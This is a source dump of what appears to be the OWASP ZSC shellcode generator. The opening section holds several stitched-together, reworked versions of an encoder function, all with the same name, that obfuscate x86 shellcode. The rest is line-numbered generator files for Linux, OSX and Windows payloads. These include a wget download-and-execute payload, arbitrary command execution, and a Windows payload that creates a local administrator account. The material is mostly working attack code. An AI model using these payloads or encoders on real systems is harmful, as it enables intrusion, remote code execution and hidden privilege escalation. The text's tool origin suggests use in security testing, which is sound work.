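            never returned in the first three cases, because nothing inside
            its ``while`` loop changed between passes.
    """
    ebx_jobs = ('exec', 'add_admin', 'dir_create', 'download_exec')
    eax_jobs = ('create_file', 'disable_firewall', 'download_tofile')
    value = str(type.rsplit('add_')[1][2:])
    for line in shellcode.rsplit('\n'):
        if not ('push' in line and '$0x' in line and ',' not in line and
                len(line) > 14):
            continue
        data = line.rsplit('push')[1].rsplit('$0x')[1]
        ebx_2 = "%x" % (int(data, 16) - int(value, 16))
        if ('00' in value or '00' in ebx_2 or
                len(ebx_2.replace('-', '')) < 7 or len(value) < 7 or
                '-' in value):
            # Both operands are fixed, so retrying cannot help.
            raise ValueError(
                'value %r cannot be used to rewrite line %r' % (value, line))
        # NOTE(review): the sign of a negative difference is dropped here,
        # exactly as the original did.
        ebx_2 = ebx_2.replace('-', '')
        if job in ebx_jobs:
            command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nadd %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % (
                str(value), str(ebx_2))
        elif job in eax_jobs:
            command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nadd %%eax,%%ecx\npop %%eax\npush %%ecx\n' % (
                str(value), str(ebx_2))
        else:
            raise ValueError('unsupported job %r' % (job,))
        shellcode = shellcode.replace(line, command)
    return shellcode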
def start(shellcode, job):
    """Rewrite long immediate pushes as "push value+1, then ``dec``".

    A line is rewritten when it contains ``push`` and ``$0x``, has no comma
    and is longer than 14 characters.  The hex operand is incremented by one
    and emitted ahead of a ``dec %ecx``, so the original immediate no longer
    appears in the text.  ``job`` is accepted but not used.
    """
    for candidate in shellcode.split('\n'):
        wanted = ('push' in candidate and '$0x' in candidate and
                  ',' not in candidate and len(candidate) > 14)
        if not wanted:
            continue
        operand = candidate.split('push')[1].split('$0x')[1]
        bumped = format(int(operand, 16) + 1, 'x')
        stub = '\npush $0x%s\npop %%ecx\ndec %%ecx\npush %%ecx\n' % bumped
        # replace() hits every occurrence of this line's text, as before.
        shellcode = shellcode.replace(candidate, stub)
    return shellcode
def start(incvalue, shellcode, job):
    """Rewrite long immediate pushes as "push value-N, then N x ``inc``".

    ``incvalue`` carries the repeat count as a decimal integer after
    ``inc_``.  A line is rewritten when it contains ``push`` and ``$0x``, has
    no comma and is longer than 14 characters: the hex operand is lowered by
    the count and followed by that many ``inc %ecx`` lines.  ``job`` is
    accepted but not used.
    """
    repeat = int(incvalue.split('inc_')[1])
    # The run of increments is the same for every rewritten line.
    inc_run = 'inc %ecx\n' * repeat
    for candidate in shellcode.split('\n'):
        wanted = ('push' in candidate and '$0x' in candidate and
                  ',' not in candidate and len(candidate) > 14)
        if not wanted:
            continue
        operand = candidate.split('push')[1].split('$0x')[1]
        lowered = format(int(operand, 16) - repeat, 'x')
        stub = '\npush $0x%s\npop %%ecx\n%s\npush %%ecx\n' % (lowered,
                                                              inc_run)
        shellcode = shellcode.replace(candidate, stub)
    return shellcode
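def start(type, shellcode, job):
    """Rewrite long immediate pushes as a ``sub`` of two constants.

    ``type`` carries the user constant after ``sub_``; the two characters
    that follow the prefix are dropped (presumably a ``0x`` -- confirm
    against the caller) and the rest is read as hex.  Every line of
    ``shellcode`` that contains ``push`` and ``$0x``, has no comma and is
    longer than 14 characters is replaced by a sequence that loads the
    constant and ``data + constant`` and subtracts the former from the
    latter; ``job`` selects which scratch register the sequence saves and
    restores.

    Raises:
        ValueError: if the constant or the computed sum contains ``00`` or
            has fewer than 7 hex digits, if the constant is negative, or if
            ``job`` is not a known job name.  The original never returned in
            the first three cases, because nothing inside its ``while`` loop
            changed between passes.
    """
    ebx_jobs = ('exec', 'add_admin', 'dir_create', 'download_exec')
    eax_jobs = ('create_file', 'disable_firewall', 'download_tofile')
    value = str(type.rsplit('sub_')[1][2:])
    for line in shellcode.rsplit('\n'):
        if not ('push' in line and '$0x' in line and ',' not in line and
                len(line) > 14):
            continue
        data = line.rsplit('push')[1].rsplit('$0x')[1]
        ebx_2 = "%x" % (int(data, 16) + int(value, 16))
        if ('00' in value or '00' in ebx_2 or
                len(ebx_2.replace('-', '')) < 7 or len(value) < 7 or
                '-' in value):
            # Both operands are fixed, so retrying cannot help.
            raise ValueError(
                'value %r cannot be used to rewrite line %r' % (value, line))
        ebx_2 = ebx_2.replace('-', '')
        if job in ebx_jobs:
            command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nsub %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % (
                str(value), str(ebx_2))
        elif job in eax_jobs:
            command = '\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nsub %%eax,%%ecx\npop %%eax\npush %%ecx\n' % (
                str(value), str(ebx_2))
        else:
            raise ValueError('unsupported job %r' % (job,))
        shellcode = shellcode.replace(line, command)
    return shellcode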
'\npush %%eax\npush $0x%s\npop %%eax\npush $0x%s\npop %%ecx\nxor %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 45 | str(ebx_1), str(ebx_2)) 46 | shellcode = shellcode.replace(line, command) 47 | t = False 48 | return shellcode 49 | -------------------------------------------------------------------------------- /lib/encoder/windows_x86/xor_yourvalue.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import random 10 | import binascii 11 | import string 12 | from core.compatible import version 13 | _version = version() 14 | chars = string.digits + string.ascii_letters 15 | 16 | 17 | def start(type, shellcode, job): 18 | value = str(type.rsplit('xor_')[1][2:]) 19 | for line in shellcode.rsplit('\n'): 20 | if 'push' in line and '$0x' in line and ',' not in line and len( 21 | line) > 14: 22 | data = line.rsplit('push')[1].rsplit('$0x')[1] 23 | t = True 24 | while t: 25 | ebx_1 = value 26 | ebx_2 = "%x" % (int(data, 16) ^ int(ebx_1, 16)) 27 | if str('00') not in str(ebx_1) and str('00') not in str( 28 | ebx_2) and len(ebx_2.replace('-', '')) >= 7 and len( 29 | ebx_1) >= 7 and '-' not in ebx_1: 30 | ebx_2 = ebx_2.replace('-', '') 31 | if job == 'exec': 32 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 33 | str(ebx_1), str(ebx_2)) 34 | elif job == 'add_admin' or job == 'dir_create' or job == 'download_exec': 35 | command = '\npush %%ebx\npush $0x%s\npop %%ebx\npush $0x%s\npop %%ecx\nxor %%ebx,%%ecx\npop %%ebx\npush %%ecx\n' % ( 36 | str(ebx_1), str(ebx_2)) 37 | elif job == 'create_file' or job == 'disable_firewall' or job == 'download_tofile': 38 | command = '\npush %%eax\npush $0x%s\npop %%eax\npush 
$0x%s\npop %%ecx\nxor %%eax,%%ecx\npop %%eax\npush %%ecx\n' % ( 39 | str(ebx_1), str(ebx_2)) 40 | shellcode = shellcode.replace(line, command) 41 | t = False 42 | return shellcode 43 | -------------------------------------------------------------------------------- /lib/generator/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC | ZCR Shellcoder 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/Ali-Razmjoo/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/chmod.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from lib.opcoder.linux_x86 import convert 11 | 12 | 13 | def chmod(perm_num, file_add): 14 | return '''push $0x0f 15 | pop %%eax 16 | %s 17 | %s 18 | mov %%esp,%%ebx 19 | int $0x80 20 | mov $0x01,%%al 21 | mov $0x01,%%bl 22 | int $0x80''' % (perm_num, file_add) 23 | 24 | 25 | def run(data): 26 | file_to_perm, perm_num 
= data[0], data[1] 27 | return chmod( 28 | stack.generate(perm_num, '%ecx', 'int'), 29 | stack.generate(file_to_perm, '%ebx', 'string')) 30 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/dir_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | dirname = data[0] 45 | command = 'mkdir %s' % (str(dirname)) 46 | return sys(stack.generate( 47 | command.replace('[space]', ' '), '%ecx', 'string')) 48 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/download.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : 
http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | url, filename = data[0], data[1] 45 | command = 'wget %s -O %s' % (str(url), str(filename)) 46 | return sys(stack.generate( 47 | command.replace('[space]', ' '), '%ecx', 'string')) 48 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/download_execute.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | 
url, filename, command = data[0], data[1], data[2] 45 | command = 'wget %s -O %s ; chmod +x %s ; %s' % ( 46 | str(url), str(filename), str(filename), str(command)) 47 | return sys(stack.generate( 48 | command.replace('[space]', ' '), '%ecx', 'string')) 49 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from lib.opcoder.linux_x86 import convert 11 | 12 | 13 | def exc(file_to_exec): 14 | return ''' 15 | mov $0x46,%%al 16 | xor %%ebx,%%ebx 17 | xor %%ecx,%%ecx 18 | int $0x80 19 | %s 20 | mov %%esp,%%ebx 21 | xor %%eax,%%eax 22 | mov $0xb,%%al 23 | int $0x80 24 | mov $0x1,%%al 25 | mov $0x1,%%bl 26 | int $0x80 27 | ''' % (file_to_exec) 28 | 29 | 30 | def run(data): 31 | file_to_exec = data[0] 32 | return exc(stack.generate(file_to_exec, '%ebx', 'string')) 33 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/file_create.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | import binascii 12 | from core import stack 13 | from lib.opcoder.linux_x86 import convert 14 | 15 | 16 | def sys(command): 17 | return '''push $0xb 18 | pop %%eax 19 | cltd 20 | push %%edx 21 | %s 22 | 
mov %%esp,%%esi 23 | push %%edx 24 | push $0x632d9090 25 | pop %%ecx 26 | shr $0x10,%%ecx 27 | push %%ecx 28 | mov %%esp,%%ecx 29 | push %%edx 30 | push $0x68 31 | push $0x7361622f 32 | push $0x6e69622f 33 | mov %%esp,%%ebx 34 | push %%edx 35 | push %%edi 36 | push %%esi 37 | push %%ecx 38 | push %%ebx 39 | mov %%esp,%%ecx 40 | int $0x80 41 | ''' % (str(command)) 42 | 43 | 44 | def run(data): 45 | filename, content = data[0], data[1] 46 | content = binascii.b2a_hex(content.replace('[space]', ' ')) 47 | l = len(content) - 1 48 | n = 0 49 | c = '\\x' 50 | for word in content: 51 | c += word 52 | n += 1 53 | if n is 2: 54 | n = 0 55 | c += '\\x' 56 | c = c[:-2] 57 | command = 'echo -e "%s" > %s' % (str(c), str(filename)) 58 | return sys(stack.generate( 59 | command.replace('[space]', ' '), '%ecx', 'string')) 60 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/script_executor.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | import sys 12 | import binascii 13 | from core import color 14 | from core import stack 15 | from lib.opcoder.linux_x86 import convert 16 | 17 | 18 | def sys_(command): 19 | return '''push $0xb 20 | pop %%eax 21 | cltd 22 | push %%edx 23 | %s 24 | mov %%esp,%%esi 25 | push %%edx 26 | push $0x632d9090 27 | pop %%ecx 28 | shr $0x10,%%ecx 29 | push %%ecx 30 | mov %%esp,%%ecx 31 | push %%edx 32 | push $0x68 33 | push $0x7361622f 34 | push $0x6e69622f 35 | mov %%esp,%%ebx 36 | push %%edx 37 | push %%edi 38 | push %%esi 39 | push %%ecx 40 | push %%ebx 41 | mov %%esp,%%ecx 42 | int $0x80 43 | ''' % 
(str(command)) 44 | 45 | 46 | def run(data): 47 | filename, content, command = data[0], data[1], data[2] 48 | command = command.replace('[space]', ' ') 49 | try: 50 | cont = binascii.b2a_hex(open(content).read()) 51 | except: 52 | from core import start 53 | sys.exit(color.color('red') + 'Error, Cannot find/open the file %s' % ( 54 | content) + color.color('reset')) 55 | l = len(cont) - 1 56 | n = 0 57 | c = '\\x' 58 | for word in cont: 59 | c += word 60 | n += 1 61 | if n is 2: 62 | n = 0 63 | c += '\\x' 64 | c = c[:-2] 65 | command = 'echo -e "%s" > %s ; chmod 777 %s ; %s' % ( 66 | str(c), str(filename), str(filename), str(command)) 67 | return sys(stack.generate( 68 | command.replace('[space]', ' '), '%ecx', 'string')) 69 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | 9 | shellcode template used : http://shell-storm.org/shellcode/files/shellcode-57.php 10 | ''' 11 | from core import stack 12 | from lib.opcoder.linux_x86 import convert 13 | 14 | 15 | def sys(command): 16 | return '''push $0xb 17 | pop %%eax 18 | cltd 19 | push %%edx 20 | %s 21 | mov %%esp,%%esi 22 | push %%edx 23 | push $0x632d9090 24 | pop %%ecx 25 | shr $0x10,%%ecx 26 | push %%ecx 27 | mov %%esp,%%ecx 28 | push %%edx 29 | push $0x68 30 | push $0x7361622f 31 | push $0x6e69622f 32 | mov %%esp,%%ebx 33 | push %%edx 34 | push %%edi 35 | push %%esi 36 | push %%ecx 37 | push %%ebx 38 | mov %%esp,%%ecx 39 | int $0x80 40 | ''' % (str(command)) 41 | 42 | 43 | def run(data): 44 | command = data[0] 45 | command = command.replace('[space]', ' ') 46 | if int(len(command)) < 5: 47 | command = 
str( 48 | command) + '[space]&&[space]echo[space]1[space]>[space]/dev/null' #bypass a bug in here, fix later 49 | #bug in line 12 & 13, check later 50 | return sys(stack.generate( 51 | command.replace('[space]', ' '), '%ecx', 'string')) 52 | -------------------------------------------------------------------------------- /lib/generator/linux_x86/write.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | import binascii 10 | from core import stack 11 | from lib.opcoder.linux_x86 import convert 12 | 13 | 14 | def write(null, file_name, content, length): 15 | return ''' 16 | push $0x5 17 | pop %%eax 18 | %s 19 | %s 20 | mov %%esp,%%ebx 21 | push $0x4014141 22 | pop %%ecx 23 | shr $0x10,%%ecx 24 | int $0x80 25 | mov %%eax,%%ebx 26 | push $0x4 27 | pop %%eax 28 | %s 29 | mov %%esp,%%ecx 30 | %s 31 | int $0x80 32 | mov $0x1,%%al 33 | mov $0x1,%%bl 34 | int $0x80 35 | ''' % (str(null), str(file_name), str(content), str(length)) 36 | 37 | 38 | def run(data): 39 | path_file, content = data[0], data[1] 40 | null = len(path_file) % 4 41 | if null is not 0: 42 | null = '' 43 | if null is 0: 44 | null = 'xor %ebx,%ebx\npush %ebx\n' 45 | return write( 46 | str(null), stack.generate( 47 | str(path_file), '%ebx', 'string'), stack.generate( 48 | str(content), '%ecx', 'string'), stack.generate( 49 | str(len(content)), '%edx', 'int')) 50 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | 
https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/chmod.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def chmod(file, perm_num): 13 | return ''' 14 | xor %%eax,%%eax 15 | push %%eax 16 | %s 17 | mov %%esp,%%edx 18 | %s 19 | push %%edx 20 | push $0xf 21 | pop %%eax 22 | push $0x2a 23 | int $0x80 24 | mov $0x01,%%al 25 | mov $0x01,%%bl 26 | int $0x80 27 | ''' % (file, perm_num) 28 | 29 | 30 | def run(data): 31 | file_to_perm, perm_num = data[0], data[1] 32 | return chmod( 33 | stack.generate(file_to_perm, '%ebx', 'string'), 34 | stack.generate(perm_num, '%ecx', 'int')) 35 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/exec.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def exc(file_to_exec): 13 | return """ 14 | %s 15 | mov %%esp,%%ebx 16 | xor %%eax,%%eax 17 | push %%eax 18 | mov %%esp,%%edx 19 | push %%ebx 20 | mov %%esp,%%ecx 21 | push %%edx 22 | push %%ecx 23 | push %%ebx 24 | mov $0x3b,%%al 25 | push $0x2a 26 | int $0x80 27 | mov $0x1,%%al 28 | mov $0x1,%%bl 29 | int $0x80 30 | 
""" % file_to_exec 31 | 32 | 33 | def run(data): 34 | file_to_exec = data[0] 35 | return exc(stack.generate(file_to_exec, '%ebx', 'string')) 36 | -------------------------------------------------------------------------------- /lib/generator/osx_x86/system.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def sys(command_to_execute): 13 | return """ 14 | %s 15 | mov %%esp,%%ecx 16 | push $0x632d9090 17 | pop %%edx 18 | shr $0x10,%%edx 19 | push %%edx 20 | mov %%esp,%%edx 21 | push $0x68732f90 22 | pop %%ebx 23 | shr $0x8,%%ebx 24 | push %%ebx 25 | push $0x6e69622f 26 | mov %%esp,%%ebx 27 | xor %%eax,%%eax 28 | push %%eax 29 | push %%ecx 30 | push %%edx 31 | push %%ebx 32 | mov %%esp,%%ecx 33 | xor %%edx,%%edx 34 | push %%edx 35 | push %%ecx 36 | push %%ebx 37 | mov $0x3b,%%al 38 | push $0x2a 39 | int $0x80 40 | mov $0x1,%%al 41 | mov $0x1,%%bl 42 | int $0x80 43 | """ % command_to_execute 44 | 45 | 46 | def run(data): 47 | command = data[0] 48 | if command.find(" ") >= 0: 49 | command = command.replace('[space]', ' ') 50 | if int(len(command)) < 5: 51 | command = str( 52 | command) + '[space]&&[space]echo[space]1[space]>[space]/dev/null' # bypass a bug in here, fix later 53 | # bug in line 12 & 13, check later 54 | return sys(stack.generate( 55 | command.replace('[space]', ' '), '%ecx', 'string')) 56 | else: 57 | return sys(stack.generate(command, '%ecx', 'string')) 58 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/__init__.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | 
https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | 10 | pass 11 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/add_admin.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | from math import ceil 11 | 12 | 13 | def add_admin(command_hex, command): 14 | return ''' 15 | xor %ecx,%ecx 16 | mov %fs:0x30(%ecx),%eax 17 | mov 0xc(%eax),%eax 18 | mov 0x14(%eax),%esi 19 | lods %ds:(%esi),%eax 20 | xchg %eax,%esi 21 | lods %ds:(%esi),%eax 22 | mov 0x10(%eax),%ebx 23 | mov 0x3c(%ebx),%edx 24 | add %ebx,%edx 25 | mov 0x78(%edx),%edx 26 | add %ebx,%edx 27 | mov 0x20(%edx),%esi 28 | add %ebx,%esi 29 | xor %ecx,%ecx 30 | inc %ecx 31 | lods %ds:(%esi),%eax 32 | add %ebx,%eax 33 | cmpl $0x50746547,(%eax) 34 | jne 23 <.text+0x23> 35 | cmpl $0x41636f72,0x4(%eax) 36 | jne 23 <.text+0x23> 37 | cmpl $0x65726464,0x8(%eax) 38 | jne 23 <.text+0x23> 39 | mov 0x24(%edx),%esi 40 | add %ebx,%esi 41 | mov (%esi,%ecx,2),%cx 42 | dec %ecx 43 | mov 0x1c(%edx),%esi 44 | add %ebx,%esi 45 | mov (%esi,%ecx,4),%edx 46 | add %ebx,%edx 47 | push %ebx 48 | push %edx 49 | xor %ecx,%ecx 50 | push %ecx 51 | mov $0x61636578,%ecx 52 | push %ecx 53 | subl $0x61,0x3(%esp) 54 | push $0x456e6957 55 | push %esp 56 | push %ebx 57 | call *%edx 58 | add $0x8,%esp 59 | pop %ecx 60 | push %eax 61 | xor %ecx,%ecx 62 | push %ecx 63 | {0} 64 | xor %ebx,%ebx 65 | mov %esp,%ebx 66 | xor %ecx,%ecx 67 | inc %ecx 68 | push %ecx 69 | push %ebx 70 | call *%eax 71 | 
add ${1},%esp 72 | pop %edx 73 | pop %ebx 74 | xor %ecx,%ecx 75 | mov $0x61737365,%ecx 76 | push %ecx 77 | subl $0x61,0x3(%esp) 78 | push $0x636f7250 79 | push $0x74697845 80 | push %esp 81 | push %ebx 82 | call *%edx 83 | xor %ecx,%ecx 84 | push %ecx 85 | call *%eax 86 | '''.format(command_hex, hex(int(8 + 4 * (ceil(len(command) / float(4)))))) 87 | 88 | 89 | def run(data): 90 | username = data[0] 91 | passsword = data[1] 92 | command = "cmd.exe /c net user " + username + " " + passsword + " /add && net localgroup administrators " + username + " /add" 93 | return add_admin(stack.generate(command, "%ecx", "string"), command) 94 | -------------------------------------------------------------------------------- /lib/generator/windows_x86/create_file.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | ''' 3 | OWASP ZSC 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project 5 | https://github.com/zscproject/OWASP-ZSC 6 | http://api.z3r0d4y.com/ 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ] 8 | ''' 9 | from core import stack 10 | 11 | 12 | def create_file(create_command): 13 | return ''' 14 | xor %ecx,%ecx 15 | mov %fs:0x30(%ecx),%eax 16 | mov 0xc(%eax),%eax 17 | mov 0x14(%eax),%esi 18 | lods %ds:(%esi),%eax 19 | xchg %eax,%esi 20 | lods %ds:(%esi),%eax 21 | mov 0x10(%eax),%ebx 22 | mov 0x3c(%ebx),%edx 23 | add %ebx,%edx 24 | mov 0x78(%edx),%edx 25 | add %ebx,%edx 26 | mov 0x20(%edx),%esi 27 | add %ebx,%esi 28 | xor %ecx,%ecx 29 | inc %ecx 30 | lods %ds:(%esi),%eax 31 | add %ebx,%eax 32 | cmpl $0x50746547,(%eax) 33 | jne 23 <.text+0x23> 34 | cmpl $0x41636f72,0x4(%eax) 35 | jne 23 <.text+0x23> 36 | cmpl $0x65726464,0x8(%eax) 37 | jne 23 <.text+0x23> 38 | mov 0x24(%edx),%esi 39 | add %ebx,%esi 40 | mov (%esi,%ecx,2),%cx 41 | dec %ecx 42 | mov 